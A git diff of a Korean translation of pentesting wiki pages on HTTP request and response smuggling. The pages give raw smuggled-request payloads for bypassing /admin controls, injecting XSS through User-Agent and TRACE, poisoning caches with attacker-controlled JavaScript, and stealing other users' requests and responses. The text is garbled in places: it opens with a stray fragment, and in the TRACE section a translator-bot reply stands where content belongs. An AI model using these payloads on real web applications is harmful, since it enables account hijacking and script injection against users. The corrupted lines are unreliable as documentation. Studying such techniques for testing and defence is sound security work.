+일부 구성에서 프론트엔드 서버는 **첫 번째 요청의 Host 헤더**를 사용하여 해당 요청의 백엔드 라우팅을 결정한 다음, 동일한 클라이언트 연결의 모든 후속 요청을 동일한 백엔드 연결로 지속적으로 라우팅할 수 있습니다. 이는 다음과 같이 설명할 수 있습니다:
 ```
 GET / HTTP/1.1
 Host: example.com
diff --git a/src/pentesting-web/http-request-smuggling/README.md b/src/pentesting-web/http-request-smuggling/README.md
index a110938d0..caae6a303 100644
--- a/src/pentesting-web/http-request-smuggling/README.md
+++ b/src/pentesting-web/http-request-smuggling/README.md
@@ -32,7 +32,7 @@
 HTTP에서 **새 줄 문자는 2바이트로 구성됩니다:**
 
 - **Content-Length**: 이 헤더는 요청 본문의 **바이트 수**를 나타내기 위해 **10진수** 숫자를 사용합니다. 본문은 마지막 문자에서 끝나야 하며, **요청 끝에 새 줄이 필요하지 않습니다**.
-- **Transfer-Encoding:** 이 헤더는 **다음 청크**의 **바이트 수**를 나타내기 위해 본문에서 **16진수** 숫자를 사용합니다. **청크**는 **새 줄**로 **끝나야** 하지만 이 새 줄은 **길이 표시기**에 의해 **계산되지 않습니다**. 이 전송 방법은 **크기 0의 청크로 끝나고 2개의 새 줄**로 이어져야 합니다: `0`
+- **Transfer-Encoding:** 이 헤더는 **다음 청크**의 **바이트 수**를 나타내기 위해 본문에서 **16진수** 숫자를 사용합니다. **청크**는 **새 줄**로 **끝나야** 하지만 이 새 줄은 **길이 표시기**에 의해 **계산되지 않습니다**. 이 전송 방법은 **크기 0의 청크로 끝나고 2개의 새 줄이 뒤따라야** 합니다: `0`
 - **Connection**: 제 경험에 따르면 요청 스머글링의 첫 번째 요청에서 **`Connection: keep-alive`**를 사용하는 것이 좋습니다.
 
 ## Basic Examples
@@ -40,7 +40,7 @@ HTTP에서 **새 줄 문자는 2바이트로 구성됩니다:**
 > [!TIP]
 > Burp Suite로 이를 악용하려고 할 때 **`Update Content-Length` 및 `Normalize HTTP/1 line endings`**를 리피터에서 비활성화하세요. 일부 도구는 새 줄, 캐리지 리턴 및 잘못된 content-length를 남용합니다.
 
-HTTP 요청 스머글링 공격은 **Content-Length** (CL) 및 **Transfer-Encoding** (TE) 헤더를 해석하는 프론트엔드와 백엔드 서버 간의 불일치를 이용하여 모호한 요청을 전송함으로써 만들어집니다. 이러한 공격은 주로 **CL.TE**, **TE.CL**, 및 **TE.TE**의 형태로 나타날 수 있습니다. 각 유형은 프론트엔드와 백엔드 서버가 이러한 헤더를 우선시하는 방식의 고유한 조합을 나타냅니다. 취약점은 서버가 동일한 요청을 서로 다른 방식으로 처리하여 예상치 못한 결과를 초래하는 데서 발생합니다.
+HTTP 요청 스머글링 공격은 **Content-Length** (CL) 및 **Transfer-Encoding** (TE) 헤더를 해석하는 프론트엔드와 백엔드 서버 간의 불일치를 이용하여 모호한 요청을 전송함으로써 만들어집니다. 이러한 공격은 주로 **CL.TE**, **TE.CL**, 및 **TE.TE**의 형태로 나타날 수 있습니다. 각 유형은 프론트엔드와 백엔드 서버가 이러한 헤더를 우선시하는 고유한 조합을 나타냅니다. 취약점은 서버가 동일한 요청을 서로 다른 방식으로 처리하여 예상치 못한 결과를 초래하는 데서 발생합니다.
 
 ### Basic Examples of Vulnerability Types
 
@@ -104,7 +104,7 @@ x=
 
 #### TE.TE Vulnerability (Transfer-Encoding used by both, with obfuscation)
 
-- **서버:** 두 서버 모두 `Transfer-Encoding`을 지원하지만, 하나는 난독화를 통해 이를 무시하도록 속일 수 있습니다.
+- **서버:** 둘 다 `Transfer-Encoding`을 지원하지만, 하나는 난독화를 통해 이를 무시하도록 속일 수 있습니다.
 - **공격 시나리오:**
 
 - 공격자는 난독화된 `Transfer-Encoding` 헤더가 있는 요청을 보냅니다.
@@ -146,7 +146,7 @@ Normal Request
 
 #### **CL.0 Scenario**
 
-- `Content-Length` 헤더가 존재하고 0이 아닌 값을 가지며 요청 본문에 콘텐츠가 있음을 나타내는 시나리오를 의미합니다. 백엔드는 `Content-Length` 헤더를 무시하고(0으로 처리됨), 프론트엔드는 이를 파싱합니다.
+- `Content-Length` 헤더가 존재하고 0이 아닌 값을 가지며 요청 본문에 콘텐츠가 있음을 나타내는 시나리오를 의미합니다. 백엔드는 `Content-Length` 헤더를 무시하지만(0으로 처리됨), 프론트엔드는 이를 파싱합니다.
 - 이는 스머글링 공격을 이해하고 구성하는 데 중요하며, 서버가 요청의 끝을 결정하는 방식에 영향을 미칩니다.
 - **예시:**
 
@@ -189,11 +189,11 @@ EMPTY_LINE_HERE
 
 #### 홉-바이-홉 헤더를 통한 강제화
 
-홉-바이-홉 헤더를 악용하여 프록시에게 **Content-Length 또는 Transfer-Encoding 헤더를 삭제하도록 지시하여 HTTP 요청 스머글링을 악용할 수 있습니다**.
+홉-바이-홉 헤더를 악용하여 프록시에게 **Content-Length 또는 Transfer-Encoding 헤더를 삭제하도록 지시하여 HTTP 요청 스머글링을 악용할 수 있습니다.**
 ```
 Connection: Content-Length
 ```
-더 많은 **hop-by-hop 헤더에 대한 정보**는 다음을 방문하세요:
+더 많은 **hop-by-hop 헤더에 대한 정보**는 다음을 방문하십시오:
 
 {{#ref}}
 ../abusing-hop-by-hop-headers.md
@@ -255,23 +255,23 @@ X
 ### 취약점을 찾기 위한 다른 방법
 
 - **차별적 응답 분석:**
-- 요청의 약간 변형된 버전을 전송하고 서버 응답이 예상치 못한 방식으로 다르게 나타나는지 관찰하여 구문 분석 불일치를 나타냅니다.
+- 요청의 약간 변형된 버전을 전송하고 서버 응답이 예상치 못한 방식으로 다르면 파싱 불일치를 나타냅니다.
 - **자동화 도구 사용:**
 - Burp Suite의 'HTTP Request Smuggler' 확장과 같은 도구는 다양한 형태의 모호한 요청을 전송하고 응답을 분석하여 이러한 취약점을 자동으로 테스트할 수 있습니다.
 - **Content-Length 변동 테스트:**
-- 실제 콘텐츠 길이와 일치하지 않는 다양한 `Content-Length` 값을 가진 요청을 전송하고 서버가 이러한 불일치를 처리하는 방식을 관찰합니다.
+- 실제 콘텐츠 길이에 맞지 않는 다양한 `Content-Length` 값을 가진 요청을 전송하고 서버가 이러한 불일치를 처리하는 방식을 관찰합니다.
 - **Transfer-Encoding 변동 테스트:**
 - 난독화되거나 잘못된 `Transfer-Encoding` 헤더를 가진 요청을 전송하고 프론트엔드와 백엔드 서버가 이러한 조작에 어떻게 다르게 반응하는지 모니터링합니다.
 
 ### HTTP 요청 스머글링 취약점 테스트
 
-타이밍 기법의 효과를 확인한 후, 클라이언트 요청을 조작할 수 있는지 확인하는 것이 중요합니다. 간단한 방법은 요청을 오염시키는 것을 시도하는 것입니다. 예를 들어, `/`에 대한 요청이 404 응답을 생성하도록 만드는 것입니다. 이전에 논의된 `CL.TE` 및 `TE.CL` 예시는 클라이언트의 요청을 오염시켜 404 응답을 유도하는 방법을 보여줍니다. 클라이언트는 다른 리소스에 접근하려고 했음에도 불구하고 말입니다.
+타이밍 기법의 효과를 확인한 후, 클라이언트 요청을 조작할 수 있는지 확인하는 것이 중요합니다. 간단한 방법은 요청을 오염시키는 것을 시도하는 것입니다. 예를 들어, `/`에 대한 요청이 404 응답을 생성하도록 만드는 것입니다. 이전에 논의된 `CL.TE` 및 `TE.CL` 예시는 클라이언트의 요청을 오염시켜 404 응답을 유도하는 방법을 보여줍니다. 클라이언트는 다른 리소스에 접근하려고 합니다.
 
 **주요 고려사항**
 
 다른 요청을 방해하여 요청 스머글링 취약점을 테스트할 때 유의해야 할 사항:
 
-- **별도의 네트워크 연결:** "공격" 요청과 "정상" 요청은 별도의 네트워크 연결을 통해 전송되어야 합니다. 두 요청 모두 동일한 연결을 사용하는 것은 취약점의 존재를 검증하지 않습니다.
+- **별도의 네트워크 연결:** "공격" 요청과 "정상" 요청은 별도의 네트워크 연결을 통해 전송되어야 합니다. 두 요청에 동일한 연결을 사용하는 것은 취약점의 존재를 검증하지 않습니다.
 - **일관된 URL 및 매개변수:** 두 요청 모두 동일한 URL 및 매개변수 이름을 사용하도록 합니다. 현대 애플리케이션은 종종 URL 및 매개변수에 따라 특정 백엔드 서버로 요청을 라우팅합니다. 이를 일치시키면 두 요청이 동일한 서버에서 처리될 가능성이 높아지며, 이는 성공적인 공격을 위한 전제 조건입니다.
 - **타이밍 및 경합 조건:** "정상" 요청은 "공격" 요청의 간섭을 감지하기 위해 다른 동시 애플리케이션 요청과 경쟁합니다. 따라서 "공격" 요청 직후에 "정상" 요청을 전송합니다. 바쁜 애플리케이션은 결론적인 취약점 확인을 위해 여러 번의 시도가 필요할 수 있습니다.
 - **로드 밸런싱 문제:** 로드 밸런서 역할을 하는 프론트엔드 서버는 요청을 다양한 백엔드 시스템에 분배할 수 있습니다. "공격" 요청과 "정상" 요청이 서로 다른 시스템에 도달하면 공격이 성공하지 않습니다. 이 로드 밸런싱 측면은 취약점을 확인하기 위해 여러 번의 시도가 필요할 수 있습니다.
@@ -283,7 +283,7 @@ X
 
 때때로 프론트엔드 프록시는 보안 조치를 시행하여 들어오는 요청을 면밀히 조사합니다. 그러나 이러한 조치는 HTTP 요청 스머글링을 악용하여 제한된 엔드포인트에 대한 무단 접근을 허용함으로써 우회될 수 있습니다. 예를 들어, `/admin`에 접근하는 것은 외부에서 금지될 수 있으며, 프론트엔드 프록시는 이러한 시도를 적극적으로 차단합니다. 그럼에도 불구하고 이 프록시는 스머글링된 HTTP 요청 내에 포함된 요청을 검사하지 않을 수 있어 이러한 제한을 우회할 수 있는 허점을 남깁니다.
 
-다음은 HTTP 요청 스머글링을 사용하여 프론트엔드 보안 제어를 우회하는 방법을 보여주는 예시입니다. 특히 일반적으로 프론트엔드 프록시에 의해 보호되는 `/admin` 경로를 목표로 합니다:
+다음은 HTTP 요청 스머글링을 사용하여 프론트엔드 보안 제어를 우회하는 방법을 보여주는 예시입니다. 특히 일반적으로 프론트엔드 프록시가 보호하는 `/admin` 경로를 목표로 합니다:
 
 **CL.TE 예시**
 ```
@@ -320,11 +320,11 @@ a=x
 0
 
 ```
-반대로, TE.CL 공격에서는 초기 `POST` 요청이 `Transfer-Encoding: chunked`를 사용하고, 이후에 포함된 요청은 `Content-Length` 헤더를 기반으로 처리됩니다. CL.TE 공격과 유사하게, 프론트엔드 프록시는 밀반입된 `GET /admin` 요청을 간과하여, 제한된 `/admin` 경로에 대한 접근을 무심코 허용합니다.
+반대로, TE.CL 공격에서는 초기 `POST` 요청이 `Transfer-Encoding: chunked`를 사용하고, 이후에 포함된 요청은 `Content-Length` 헤더를 기반으로 처리됩니다. CL.TE 공격과 유사하게, 프론트엔드 프록시는 밀반입된 `GET /admin` 요청을 간과하여, 의도치 않게 제한된 `/admin` 경로에 대한 접근을 허용합니다.
 
 ### 프론트엔드 요청 재작성 공개 <a href="#revealing-front-end-request-rewriting" id="revealing-front-end-request-rewriting"></a>
 
-애플리케이션은 종종 **프론트엔드 서버**를 사용하여 들어오는 요청을 수정한 후 백엔드 서버에 전달합니다. 일반적인 수정 사항은 클라이언트의 IP를 백엔드에 전달하기 위해 `X-Forwarded-For: <IP of the client>`와 같은 헤더를 추가하는 것입니다. 이러한 수정 사항을 이해하는 것은 **보호 우회** 또는 **숨겨진 정보나 엔드포인트를 발견하는 방법**을 드러낼 수 있기 때문에 중요할 수 있습니다.
+응용 프로그램은 종종 **프론트엔드 서버**를 사용하여 들어오는 요청을 수정한 후 백엔드 서버에 전달합니다. 일반적인 수정 사항은 `X-Forwarded-For: <IP of the client>`와 같은 헤더를 추가하여 클라이언트의 IP를 백엔드에 전달하는 것입니다. 이러한 수정 사항을 이해하는 것은 **보호 우회** 또는 **숨겨진 정보나 엔드포인트를 발견하는 방법**을 드러낼 수 있기 때문에 중요할 수 있습니다.
 
 프록시가 요청을 어떻게 변경하는지 조사하려면, 백엔드가 응답에서 에코하는 POST 매개변수를 찾습니다. 그런 다음, 이 매개변수를 마지막에 사용하여 다음과 유사한 요청을 작성합니다:
 ```
@@ -345,7 +345,7 @@ search=
 ```
 이 구조에서 후속 요청 구성 요소는 `search=` 뒤에 추가되며, 이는 응답에 반영되는 매개변수입니다. 이 반영은 후속 요청의 헤더를 노출시킵니다.
 
-중요한 것은 중첩 요청의 `Content-Length` 헤더를 실제 콘텐츠 길이에 맞추는 것입니다. 작은 값으로 시작하여 점진적으로 증가시키는 것이 좋습니다. 너무 낮은 값은 반영된 데이터를 잘라내고, 너무 높은 값은 요청이 오류를 발생시킬 수 있습니다.
+중요한 것은 중첩 요청의 `Content-Length` 헤더를 실제 콘텐츠 길이에 맞추는 것입니다. 작은 값으로 시작하고 점진적으로 증가시키는 것이 좋습니다. 너무 낮은 값은 반영된 데이터를 잘라내고, 너무 높은 값은 요청이 오류를 발생시킬 수 있습니다.
 
 이 기술은 TE.CL 취약점의 맥락에서도 적용 가능하지만, 요청은 `search=\r\n0`으로 종료되어야 합니다. 줄 바꿈 문자와 관계없이 값은 검색 매개변수에 추가됩니다.
 
@@ -409,13 +409,13 @@ Content-Type: application/x-www-form-urlencoded
 
 A=
 ```
-이 페이로드는 취약점을 악용하기 위해 다음과 같이 구성됩니다:
+이 페이로드는 취약점을 악용하기 위해 다음과 같이 구조화되었습니다:
 
 1. `Transfer-Encoding: chunked` 헤더가 있는 일반적인 `POST` 요청을 시작하여 밀반입의 시작을 나타냅니다.
-2. 다음으로 `0`을 추가하여 청크된 메시지 본문의 끝을 표시합니다.
+2. 다음으로 `0`을 사용하여 청크된 메시지 본문의 끝을 표시합니다.
 3. 그런 다음, `User-Agent` 헤더에 `<script>alert(1)</script>` 스크립트를 주입한 밀반입된 `GET` 요청이 도입되어, 서버가 이 후속 요청을 처리할 때 XSS가 트리거됩니다.
 
-밀반입을 통해 `User-Agent`를 조작함으로써, 페이로드는 정상 요청 제약을 우회하여 비표준이지만 효과적인 방식으로 반사 XSS 취약점을 악용합니다.
+밀반입을 통해 `User-Agent`를 조작함으로써, 페이로드는 정상 요청 제약을 우회하여 비표준이지만 효과적인 방식으로 반사된 XSS 취약점을 악용합니다.
 
 #### HTTP/0.9
 
@@ -424,7 +424,7 @@ A=
 
 HTTP/0.9 버전은 1.0 이전의 버전으로, **GET** 동사만 사용하며 **헤더**로 응답하지 않고 본체만 응답합니다.
 
-[**이 글**](https://mizu.re/post/twisty-python)에서는 요청 밀반입과 **사용자의 입력에 응답하는 취약한 엔드포인트**를 이용하여 HTTP/0.9로 요청을 밀반입했습니다. 응답에 반영될 매개변수는 **가짜 HTTP/1.1 응답(헤더와 본체 포함)**을 포함하여 응답이 `Content-Type`이 `text/html`인 유효한 실행 가능한 JS 코드를 포함하게 됩니다.
+[**이 글**](https://mizu.re/post/twisty-python)에서는 요청 밀반입과 **사용자의 입력에 응답하는 취약한 엔드포인트**를 이용하여 HTTP/0.9로 요청을 밀반입했습니다. 응답에 반영될 매개변수는 **유효한 HTTP/1.1 응답(헤더와 본체 포함)**을 포함하여 응답이 `Content-Type`이 `text/html`인 실행 가능한 JS 코드를 포함하게 됩니다.
 
 ### HTTP 요청 밀반입을 통한 사이트 내 리디렉션 악용 <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
 
@@ -468,11 +468,11 @@ Location: https://attacker-website.com/home/
 
 ### HTTP Request Smuggling을 통한 웹 캐시 오염 활용 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-웹 캐시 오염은 **프론트엔드 인프라의 콘텐츠를 캐시**하는 어떤 구성 요소가 있을 경우 실행될 수 있으며, 일반적으로 성능 향상을 위해 사용됩니다. 서버의 응답을 조작함으로써 **캐시를 오염**시킬 수 있습니다.
+웹 캐시 오염은 **프론트엔드 인프라의 어떤 구성 요소가 콘텐츠를 캐시**할 경우 실행될 수 있으며, 일반적으로 성능 향상을 위해 사용됩니다. 서버의 응답을 조작함으로써 **캐시를 오염**시킬 수 있습니다.
 
 이전에 서버 응답을 변경하여 404 오류를 반환하는 방법을 관찰했습니다 (참조: [Basic Examples](./#basic-examples)). 유사하게, 서버를 속여 `/static/include.js` 요청에 대한 응답으로 `/index.html` 콘텐츠를 제공하도록 할 수 있습니다. 결과적으로 `/static/include.js` 콘텐츠는 캐시에서 `/index.html`의 콘텐츠로 대체되어, `/static/include.js`가 사용자에게 접근할 수 없게 되어 서비스 거부(DoS)로 이어질 수 있습니다.
 
-이 기술은 **Open Redirect 취약점**이 발견되거나 **오픈 리디렉션으로의 사이트 내 리디렉션**이 있을 경우 특히 강력해집니다. 이러한 취약점을 이용하여 `/static/include.js`의 캐시된 콘텐츠를 공격자가 제어하는 스크립트로 교체할 수 있으며, 이는 업데이트된 `/static/include.js`를 요청하는 모든 클라이언트에 대한 광범위한 교차 사이트 스크립팅(XSS) 공격을 가능하게 합니다.
+이 기술은 **Open Redirect 취약점**이 발견되거나 **오픈 리디렉션으로의 사이트 내 리디렉션**이 있을 경우 특히 강력해집니다. 이러한 취약점을 이용하여 `/static/include.js`의 캐시된 콘텐츠를 공격자가 제어하는 스크립트로 대체할 수 있으며, 이는 업데이트된 `/static/include.js`를 요청하는 모든 클라이언트에 대한 광범위한 교차 사이트 스크립팅(XSS) 공격을 가능하게 합니다.
 
 아래는 **사이트 내 리디렉션과 오픈 리디렉션을 결합한 캐시 오염 활용**의 예시입니다. 목표는 공격자가 제어하는 JavaScript 코드를 제공하기 위해 `/static/include.js`의 캐시 콘텐츠를 변경하는 것입니다:
 ```
@@ -516,17 +516,17 @@ x=1
 `GET /private/messages HTTP/1.1`\
 `Foo: X`
 ```
-이 스머글된 요청이 정적 콘텐츠(예: `/someimage.png`)를 위한 캐시 항목을 오염시키면, 피해자의 `/private/messages`의 민감한 데이터가 정적 콘텐츠의 캐시 항목 아래에 캐시될 수 있습니다. 결과적으로, 공격자는 이러한 캐시된 민감한 데이터를 검색할 수 있습니다.
+이 스머글된 요청이 정적 콘텐츠를 위한 캐시 항목을 오염시키면(예: `/someimage.png`), 피해자의 `/private/messages`의 민감한 데이터가 정적 콘텐츠의 캐시 항목 아래에 캐시될 수 있습니다. 결과적으로 공격자는 이러한 캐시된 민감한 데이터를 검색할 수 있습니다.
 
 ### HTTP 요청 스머글링을 통한 TRACE 남용 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-[**이 게시물에서**](https://portswigger.net/research/trace-desync-attack) 서버에 TRACE 메서드가 활성화되어 있다면 HTTP 요청 스머글링으로 이를 악용할 수 있다고 제안합니다. 이는 이 메서드가 서버에 전송된 모든 헤더를 응답 본문의 일부로 반영하기 때문입니다. 예를 들어:
+[**이 게시물에서**](https://portswigger.net/research/trace-desync-attack) 서버에 TRACE 메서드가 활성화되어 있다면 HTTP 요청 스머글링으로 이를 남용할 수 있다고 제안합니다. 이는 이 메서드가 서버에 전송된 모든 헤더를 응답 본문의 일부로 반영하기 때문입니다. 예를 들어:
 ```
 TRACE / HTTP/1.1
 Host: example.com
 XSS: <script>alert("TRACE")</script>
 ```
-I'm ready to assist you with the translation. Please provide the text you would like to have translated.
+I'm ready to assist you with the translation. Please provide the text you would like me to translate.
 ```
 HTTP/1.1 200 OK
 Content-Type: message/http
@@ -587,7 +587,7 @@ Content-Length: 50
 
 <script>alert(“arbitrary response”)</script>
 ```
-### HTTP 요청 스머글링을 HTTP 응답 비동기화로 무기화하기
+### HTTP 요청 스머글링을 HTTP 응답 비동기화로 무장하기
 
 HTTP 요청 스머글링 취약점을 발견했지만 이를 어떻게 악용할지 모르겠다면, 다음의 다른 악용 방법을 시도해 보세요:
 
diff --git a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
index e65197e6f..41a12ad95 100644
--- a/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
+++ b/src/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
@@ -2,6 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**게시물 확인: [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
+**게시물 확인 [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/http-response-smuggling-desync.md b/src/pentesting-web/http-response-smuggling-desync.md
index b8b9c4728..b1e3389f5 100644
--- a/src/pentesting-web/http-response-smuggling-desync.md
+++ b/src/pentesting-web/http-response-smuggling-desync.md
@@ -8,23 +8,23 @@
 
 우선, 이 기술은 **HTTP Request Smuggling 취약점**을 **악용**하므로, 그것이 무엇인지 알아야 합니다:
 
-이 기술과 일반적인 HTTP Request Smuggling의 **주요 차이점**은 **희생자의 요청에 접두사를 추가하여 공격하는 대신**, 우리는 **희생자가 받는 응답을 유출하거나 수정할 것**이라는 점입니다. 이는 HTTP Request Smuggling을 악용하기 위해 1.5개의 요청을 보내는 대신, **프록시 응답 대기열을 비동기화하기 위해 2개의 완전한 요청을 보냅니다**.
+이 기술과 일반적인 HTTP Request Smuggling의 **주요 차이점**은 **희생자의 요청에 접두사를 추가하여 공격하는 대신**, 우리는 **희생자가 받는 응답을 유출하거나 수정할 것**이라는 점입니다. 이는 HTTP Request Smuggling을 악용하기 위해 1.5개의 요청을 보내는 대신, **프록시 응답 대기열을 비동기화하기 위해 2개의 완전한 요청을 보냄으로써** 이루어집니다.
 
-이는 우리가 **응답 대기열을 비동기화**할 수 있기 때문에 **희생자의 정당한 요청의 응답이 공격자에게 전송되거나**, **희생자에게 응답하는 내용에 공격자가 제어하는 콘텐츠를 주입**할 수 있습니다.
+이는 우리가 **응답 대기열을 비동기화**할 수 있기 때문에 **희생자의 정당한 요청의 응답이 공격자에게 전송되거나**, **희생자에게 응답하는 내용에 공격자가 제어하는 콘텐츠를 주입**할 수 있기 때문입니다.
 
 ### HTTP 파이프라인 비동기화
 
 HTTP/1.1은 **이전 요청을 기다리지 않고도 다양한 리소스를 요청할 수** 있습니다. 따라서, **중간에 프록시**가 있다면, 프록시의 작업은 **백엔드에 전송된 요청과 그로부터 오는 응답을 동기화된 상태로 유지하는 것**입니다.
 
-그러나 응답 대기열을 비동기화하는 데 문제가 있습니다. 공격자가 HTTP Response Smuggling 공격을 보내고 **초기 요청과 밀반입된 요청에 대한 응답이 즉시 응답되면**, 밀반입된 응답은 희생자 응답의 대기열에 삽입되지 않고 **단순히 오류로 폐기됩니다**.
+그러나 응답 대기열을 비동기화하는 데 문제가 있습니다. 공격자가 HTTP Response Smuggling 공격을 보내고 **초기 요청과 밀반입된 요청에 대한 응답이 즉시 응답**되면, 밀반입된 응답은 희생자의 응답 대기열에 삽입되지 않고 **단순히 오류로 폐기**됩니다.
 
 ![](<../images/image (633).png>)
 
-따라서, **밀반입된 요청이 백엔드 서버에서 처리되는 데 더 많은 시간이 걸리도록 해야** 합니다. 따라서 밀반입된 요청이 처리될 때쯤에는 공격자와의 통신이 종료됩니다.
+따라서, **밀반입된 요청이 백엔드 서버에서 처리되는 데 더 많은 시간이 걸리도록** 해야 합니다. 따라서 밀반입된 요청이 처리될 때쯤에는 공격자와의 통신이 종료될 것입니다.
 
-특정 상황에서 **희생자가 요청을 보냈고** **밀반입된 요청이 정당한 요청보다 먼저 응답되면**, **밀반입된 응답이 희생자에게 전송됩니다**. 따라서 공격자는 **희생자가 "수행한" 요청을 제어하게 됩니다**.
+특정 상황에서 **희생자가 요청을 보냈고** **밀반입된 요청이 정당한 요청보다 먼저 응답**되면, **밀반입된 응답이 희생자에게 전송**됩니다. 따라서 공격자는 **희생자가 "수행한" 요청을 제어하게 됩니다**.
 
-게다가, **공격자가 요청을 수행하고** **희생자 요청에 대한 정당한 응답이 공격자의 요청보다 먼저 응답되면**, **희생자에 대한 응답이 공격자에게 전송되어**, **희생자에 대한 응답을 훔치게 됩니다** (예를 들어, **Set-Cookie** 헤더를 포함할 수 있습니다).
+게다가, **공격자가 요청을 수행하고** **희생자 요청에 대한 정당한 응답이** **공격자의 요청보다 먼저 응답**되면, **희생자에 대한 응답이 공격자에게 전송**되어 **희생자에 대한 응답을 훔치게 됩니다** (예를 들어, **Set-Cookie** 헤더를 포함할 수 있습니다).
 
 ![](<../images/image (1020).png>)
 
@@ -32,15 +32,15 @@ HTTP/1.1은 **이전 요청을 기다리지 않고도 다양한 리소스를 요
 
 ### 다중 중첩 주입
 
-일반적인 **HTTP Request Smuggling**과의 또 다른 **흥미로운 차이점**은, 일반적인 밀반입 공격에서는 **목표가 희생자의 요청 시작 부분을 수정하여 예상치 못한 작업을 수행하게 하는 것**입니다. **HTTP Response Smuggling 공격**에서는 **전체 요청을 보내기 때문에**, **하나의 페이로드에 수십 개의 응답을 주입**하여 **수십 명의 사용자를 비동기화**할 수 있습니다.
+일반적인 **HTTP Request Smuggling**과의 또 다른 **흥미로운 차이점**은, 일반적인 밀반입 공격에서는 **목표가 희생자의 요청 시작 부분을 수정하여 예상치 못한 행동을 수행하게 하는 것**입니다. **HTTP Response Smuggling 공격**에서는 **전체 요청을 보내기 때문에**, **하나의 페이로드에 수십 개의 응답을 주입**하여 **수십 명의 사용자를 비동기화**할 수 있습니다.
 
-정당한 사용자에게 수십 개의 익스플로잇을 **더 쉽게 배포할 수 있을 뿐만 아니라**, 이는 서버에 **DoS**를 유발하는 데도 사용될 수 있습니다.
+정당한 사용자에게 수십 개의 익스플로잇을 **더 쉽게 배포**할 수 있을 뿐만 아니라, 이는 서버에 **DoS**를 유발하는 데도 사용될 수 있습니다.
 
 ### 익스플로잇 조직
 
-앞서 설명한 바와 같이, 이 기술을 악용하기 위해서는 **서버에 밀반입된 첫 번째 메시지가 처리되는 데 많은 시간이 걸리도록 해야** 합니다.
+앞서 설명한 바와 같이, 이 기술을 악용하기 위해서는 **서버에 밀반입된 첫 번째 메시지가 처리되는 데 많은 시간이 걸리도록** 해야 합니다.
 
-이 **시간 소모 요청은** 우리가 **희생자의 응답을 훔치려는 경우** 충분합니다. 그러나 더 복잡한 익스플로잇을 수행하려면 익스플로잇의 일반적인 구조가 필요합니다.
+이 **시간 소모 요청은** 우리가 **희생자의 응답을 훔치려고 할 때 충분합니다.** 그러나 더 복잡한 익스플로잇을 수행하려면, 이는 익스플로잇의 일반적인 구조가 될 것입니다.
 
 우선 **HTTP Request Smuggling**을 악용한 **초기** 요청, 그 다음 **시간 소모 요청**, 그리고 **희생자에게 전송될 응답을 포함하는 1개 이상의 페이로드 요청**입니다.
 
@@ -48,47 +48,47 @@ HTTP/1.1은 **이전 요청을 기다리지 않고도 다양한 리소스를 요
 
 ### 다른 사용자의 요청 캡처 <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
 
-HTTP Request Smuggling의 알려진 페이로드와 마찬가지로, **희생자의 요청을 훔칠 수 있습니다**. 단, 이 경우 **응답에 반영될 콘텐츠를 보내기만 하면 되며**, **지속적인 저장소**는 필요하지 않습니다.
+HTTP Request Smuggling의 알려진 페이로드와 마찬가지로, **희생자의 요청을 훔칠 수 있습니다**. 한 가지 중요한 차이점은: 이 경우 **응답에 반영될 콘텐츠를 보내기만 하면 되며**, **지속적인 저장소**가 필요하지 않습니다.
 
 먼저, 공격자는 **반영된 매개변수를 포함한 최종 POST 요청**을 포함하는 페이로드를 보내고, 큰 Content-Length를 설정합니다.
 
 ![](<../images/image (1053).png>)
 
-그런 다음, **초기 요청**(파란색)이 **처리되고** **수면 중인** 요청이 처리되는 동안(노란색) **희생자로부터 도착하는 다음 요청**이 **반영된 매개변수 바로 뒤에 대기열에 추가됩니다**:
+그런 다음, **초기 요청**(파란색)이 **처리되고** **수면 중인** 요청이 처리되는 동안(노란색) **희생자로부터 도착하는 다음 요청이 반영된 매개변수 바로 뒤에 대기열에 추가**됩니다:
 
 ![](<../images/image (794).png>)
 
-그 후, **희생자**는 **수면 중인** 요청에 대한 **응답을 받게 되고**, 그 사이에 **공격자가 또 다른 요청을 보냈다면**, **반영된 콘텐츠 요청의 응답이 그에게 전송됩니다**.
+그 후, **희생자**는 **수면 중인** 요청에 대한 **응답을 받게 되고**, 그 사이에 **공격자가 또 다른 요청을 보냈다면**, **반영된 콘텐츠 요청의 응답이 그에게 전송**됩니다.
 
 ## 응답 비동기화
 
-지금까지 우리는 HTTP Request Smuggling 공격을 악용하여 **클라이언트가 받을 응답을 제어하는 방법**과 **희생자를 위한 응답을 훔치는 방법**을 배웠습니다.
+지금까지 우리는 HTTP Request Smuggling 공격을 악용하여 **클라이언트가 받을 응답을 제어**하는 방법과, 그 후 **희생자를 위한 응답을 훔치는 방법**을 배웠습니다.
 
-하지만 여전히 응답을 **더 비동기화**할 수 있습니다.
+하지만 여전히 응답을 **더 비동기화**할 수 있는 방법이 있습니다.
 
-**HEAD** 요청과 같은 흥미로운 요청이 있으며, 이는 **응답 본문에 아무 콘텐츠도 포함하지 않아야 하며**, **GET 요청인 것처럼 Content-Length를 포함해야 합니다**.
+**HEAD** 요청과 같은 흥미로운 요청이 있으며, 이는 **응답 본문에 아무 콘텐츠도 포함하지 않아야 하며**, **GET 요청인 것처럼 요청의 Content-Length를 포함해야 합니다**.
 
 따라서 공격자가 **HEAD** 요청을 **주입**하면, 다음과 같은 이미지와 같이:
 
 ![](<../images/image (1107).png>)
 
-그런 다음, **파란색 요청이 공격자에게 응답되면**, 다음 희생자의 요청이 대기열에 추가됩니다:
+그런 다음, **파란색 요청이 공격자에게 응답**되면, 다음 희생자의 요청이 대기열에 추가됩니다:
 
 ![](<../images/image (999).png>)
 
